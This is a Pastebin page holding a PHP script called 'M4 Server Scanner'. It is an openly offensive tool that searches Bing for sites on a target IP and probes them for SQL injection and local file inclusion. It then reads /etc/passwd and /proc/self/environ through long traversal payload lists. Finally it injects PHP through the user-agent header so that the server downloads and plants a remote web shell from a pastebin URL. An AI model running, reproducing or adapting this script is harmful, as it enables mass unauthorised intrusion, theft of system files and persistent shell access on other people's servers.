API tools faq
paste
inj3ctor_m4

M4 Server Scanner

inj3ctor_m4
Oct 14th, 2014
635
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 6.76 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. #M4 Server Scanner // INJ3CTOR_M4
  3. set_time_limit(0);
  4. error_reporting(0);
  5.  
  6. $options = getopt('s:l:');
  7. if (isset ($options['s'])){
  8.     echo"\n\t\tScanning SQLi From ".$options['s']."\n\n";
  9.     $dorks = array('?id=', '.php?id=', '.php?category=', '.php?cat=', '.php?article_id=', '.php?product_id=', '?attachment_id=');
  10.     foreach($dorks as $dork){
  11.         foreach(Bing_it ("ip:".$options['s']." $dork") as $url){
  12.             Check_Sql_Inj ($url);
  13.         }
  14.     }
  15. }elseif (isset ($options['l'])){
  16.     echo"\n\t\tScanning LFI From ".$options['l']."\n\n";
  17.     $dorks = array('.php?action=', '.php?download=', '.php?file=', '.php?f=', '.php?page=', '.php?pg=', '.php?pagina=', '.php?lang=', '.php?language=');
  18.     foreach($dorks as $dork){
  19.         foreach(Bing_it ("ip:".$options['l']." $dork") as $url){
  20.             lfi($url);
  21.         }
  22.     }
  23. }
  24.  
  25. function Bing_it ($dork){
  26.     for($i = 1; $i <= 2000; $i += 10){
  27.         $data = Get_Source ("http://www.bing.com/search?q=".urlencode($dork)."&first=$i","SamsungI8910/SymbianOS/9.1 Series60/3.0");
  28.         if (preg_match_all ('#<h2 class="sb_h3 cttl"><a href="(.*?)"#i', $data, $links)){
  29.             foreach($links[1] as $link){
  30.                 $allLinks[] = $link;
  31.             }
  32.             if (!preg_match ('#class="sb_pagN"#i', $data)) break;
  33.         }
  34.     }
  35.     if(!empty($allLinks) && is_array($allLinks)){
  36.         return array_unique($allLinks);
  37.     }
  38. }
  39.  
  40. function Check_Sql_Inj ($url){
  41.     $data = Get_Source ("$url%27","Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)");
  42.     if (preg_match ("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $data)){
  43.         echo "[+] $url >> Vulnerable !\r\n";
  44.     }else{
  45.         echo "[~] $url\r\n";
  46.     }
  47. }
  48.  
  49. function lfi($url){
  50.     $site = _Fix($url);
  51.     $data = Get_Source ($site.'__dz__',"Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)");
  52.     if (preg_match ("/failed to open stream/i", $data)){
  53.         echo "[+] $site >> Vulnerable !\r\n";
  54.         $etcs = array ('/etc/passwd','../etc/passwd','../../etc/passwd','../../../etc/passwd','../../../../etc/passwd','../../../../../etc/passwd','../../../../../../etc/passwd','../../../../../../../etc/passwd','../../../../../../../../etc/passwd','../../../../../../../../../etc/passwd','../../../../../../../../../../etc/passwd','../../../../../../../../../../../etc/passwd','../../../../../../../../../../../../etc/passwd','../../../../../../../../../../../../../etc/passwd','../../../../../../../../../../../../../../etc/passwd','../../../../../../../../../../../../../../../../etc/passwd','....//etc/passwd','....//....//etc/passwd','....//....//....//etc/passwd','....//....//....//....//etc/passwd','....//....//....//....//....//etc/passwd','....//....//....//....//....//....//etc/passwd','....//....//....//....//....//....//....//etc/passwd','....//....//....//....//....//....//....//....//etc/passwd','....//....//....//....//....//....//....//....//....//etc/passwd','....//....//....//....//....//....//....//....//....//....//etc/passwd','../../etc/passwd%00','../../../etc/passwd%00','../../../../etc/passwd%00','../../../../../etc/passwd%00','../../../../../../etc/passwd%00','../../../../../../../etc/passwd%00','../../../../../../../../etc/passwd%00','../../../../../../../../../etc/passwd%00','../../../../../../../../../../etc/passwd%00','../../../../../../../../../../../etc/passwd%00','../../../../../../../../../../../../etc/passwd%00','../../../../../../../../../../../../../etc/passwd%00','../../../../../../../../../../../../../../etc/passwd%00','../../../../../../../../../../../../../../../../etc/passwd%00','....//etc/passwd%00','....//....//etc/passwd%00','....//....//....//etc/passwd%00','....//....//....//....//etc/passwd%00','....//....//....//....//....//etc/passwd%00','....//....//....//....//....//....//etc/passwd%00','....//....//....//....//....//....//....//etc/passwd%00','....//....//....//....//....//....//....//....//etc/passwd%00','....//....//....//....//....//....//....//....//....//etc/passwd%00','....//....//....//....//....//....//....//....//....//....//etc/passwd%00');
  55.         foreach ($etcs as $etc){
  56.             $data = Get_Source ($site.$etc,"Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)");
  57.             if (preg_match ("/root:x:/", $data)){
  58.                 echo"\t[+] $etc : Passwd Found!\r\n";
  59.             }
  60.         }
  61.         $environs = array ('/proc/self/environ','../proc/self/environ','../../proc/self/environ','../../../proc/self/environ','../../../../proc/self/environ','../../../../../proc/self/environ','../../../../../../proc/self/environ','../../../../../../../proc/self/environ','../../../../../../../../proc/self/environ','../../../../../../../../../proc/self/environ','../../../../../../../../../../proc/self/environ','../../../../../../../../../../../proc/self/environ','../../../../../../../../../../../../proc/self/environ','../../../../../../../../../../../../../proc/self/environ','../../../../../../../../../../../../../../proc/self/environ','/proc/self/environ%00','../proc/self/environ%00','../../proc/self/environ%00','../../../proc/self/environ%00','../../../../proc/self/environ%00','../../../../../proc/self/environ%00','../../../../../../proc/self/environ%00','../../../../../../../proc/self/environ%00','../../../../../../../../proc/self/environ%00','../../../../../../../../../proc/self/environ%00','../../../../../../../../../../proc/self/environ%00','../../../../../../../../../../../proc/self/environ%00','../../../../../../../../../../../../proc/self/environ%00','../../../../../../../../../../../../../proc/self/environ%00','../../../../../../../../../../../../../../proc/self/environ%00');
  62.         foreach ($environs as $environ){
  63.             $data = Get_Source ($site.$environ,"Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)");
  64.             if (preg_match ("/HTTP_HOST/", $data)){
  65.                 echo"\t[+] $environ : Environ Found!\r\n";
  66.                 Get_Source ($site.$environ,"<?php file_put_contents('mogy.php',file_get_contents('http://pastebin.com/raw.php?i=2aPpqpNP'));  ?>");
  67.                 $pathinfo = pathinfo($site);
  68.                 $shellpath = $pathinfo['dirname'].'/mogy.php';
  69.                 if (preg_match ("/By Mogy/", Get_Source ($shellpath))){
  70.                     echo"\tShell Uploaded: $shellpath\n\n";
  71.                 }else{
  72.                     echo"Environ Methode Don't Allowed\n\n";
  73.                 }
  74.             }
  75.         }
  76.     }
  77. }
  78.  
  79. function _Fix($site){ preg_match_all("#(.*?)?(.*?)=(.*?)#",$site,$res); return $res[2][0]."="; }
  80.  
  81. function Get_Source ($url, $user_agent){
  82.     $ch = curl_init();
  83.     curl_setopt ($ch, CURLOPT_URL, $url);
  84.     curl_setopt ($ch, CURLOPT_USERAGENT, $user_agent);
  85.     curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  86.     curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  87.     curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  88.     curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  89.     curl_setopt ($ch, CURLOPT_ENCODING, "gzip, deflate, compress");
  90.     curl_setopt ($ch, CURLOPT_FRESH_CONNECT, 1);
  91.     $source = curl_exec($ch);
  92.     curl_close($ch);
  93.    
  94.     return $source;
  95. }
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!